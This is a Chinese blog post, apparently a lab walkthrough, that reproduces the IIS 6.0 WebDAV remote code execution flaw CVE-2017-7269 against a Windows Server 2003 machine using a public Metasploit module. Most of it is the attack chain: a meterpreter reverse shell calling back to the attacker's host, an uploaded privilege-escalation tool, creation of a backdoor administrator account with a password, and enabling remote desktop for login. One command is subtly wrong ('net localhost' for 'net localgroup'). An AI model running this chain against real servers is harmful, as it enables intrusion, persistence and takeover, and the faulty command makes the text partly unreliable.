您的位置:首页 > 编程语言

iis6.0远程代码执行漏洞复现(CVE-2017-7269)

2018-01-22 14:25 3519 查看
一.实验环境搭建

1.目标机:windows server 2003 r2



2.iis配置



目标机ip:192.168.1.175

二.攻击机器

一台kai liunx

ip:192.168.1.144

三.开始攻击了

exp:https://github.com/zcgonvh/cve-2017-7269



1.把exp 复制到攻击机器的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下



2.打开神器Metasploit



3.输入use命令,use exploit/windows/iis/cve-2017-7269



4.使用命令show options



5.设置目标机ip,set RHOST 192.168.1.175

6.设置对面网站,set HttpHost 192.168.1.175

7.设置返回载荷,set payload windows/meterpreter/reverse_tcp

8.设置攻击机ip,set LHOST 192.168.1.144

9.进行溢出,exploit



10.如果出现错误Exploit completed, but no session was created,有可能是攻击的过多,可以尝试重启,实在不行就恢复快照



11.输入shell命令,来到了我们所熟悉的界面



12.查看当前用户权限,whoami,发现只是个一般用户权限



13.cd到网站目录,命令:c:\Inetpub\wwwroot,但是小编这里是没有权限进行创建文件,文件夹等操作的



14.来到c盘根目录,cd c:\,进行新建文件夹,发现创建成功(实际情况中就只有一个文件夹一个文件夹的寻找了)



14.按Ctrl + C退出shell,输出y



15.利用Metasploit的上传功能,把提权工具iis6.exe上传到刚刚新建的文件里(提权工具有很多,iis6.exe,pr.exe等等)



16.又回到shell里面确定工具上传是否成功



17.利用工具进行提权,命令:iis6.exe "whoami",已经是system权限了



18.进行新建用户,iis6.exe "net user DarkHQ !@#qwe123 /add"



19.添加用户到管理员,iis6.exe "net localhost administrators DarkHQ /add"



20.查看远程连接是否打开,没有打开,命令:netstat -an



21.再上传一个开3389.bat,利用iis6.exe运行,打开目标机的3389端口(上传3389.bat的方法和上面iis6.exe上传方法一样)

命令:iis6.exe "3389.bat"



22.查看是否打开,netstat -an,已经成功打开



23.进行远程连接,本地cmd输入命令:mstsc



24.利用之前新建的管理员成功登录



感谢各位大佬赏脸,有什么不足的地方请多多指教,欢迎意见轰炸,谢谢!!!
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: